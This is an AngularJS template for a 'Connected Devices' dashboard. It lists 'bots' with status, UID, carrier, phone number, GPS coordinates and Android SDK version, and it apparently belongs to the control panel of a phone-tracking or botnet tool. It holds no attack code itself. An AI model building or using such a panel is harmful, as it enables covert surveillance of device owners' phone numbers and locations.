<h1>Connected Devices</h1>
<table class="table">
  <thead>
    <tr>
      <th>Device</th>
      <th>Status</th>
      <th>Last Seen</th>
      <th>UID</th>
      <th>Provider</th>
      <th>Phone#</th>
      <th>Location</th>
      <th>SDK</th>
      <th>Version</th>
    </tr>
  </thead>
  <tbody>
    <tr ng-repeat="bot in bots">
      <td>
        <a ui-sref="dashboard.bot({id: bot.id})">{{bot.device}}</a>
      </td>
      <td class="{{bot.status? 'text-success' : 'text-danger'}}">{{bot.status ? 'ONLINE' : 'OFFLINE'}}</td>
      <td>{{bot.updated | amCalendar:referenceTime:formats}}</td>
      <td>{{bot.uid}}</td>
      <td>{{bot.provider}}</td>
      <td>{{bot.phone}}</td>
      <td>({{bot.lat}}, {{bot.longi}})</td>
      <td>{{bot.sdk}}</td>
      <td>{{bot.version}}</td>
    </tr>
    <tr ng-show="bots.length == 0">
      <td colspan="9">
        <strong>No devices.</strong>
      </td>
    </tr>
  </tbody>
</table>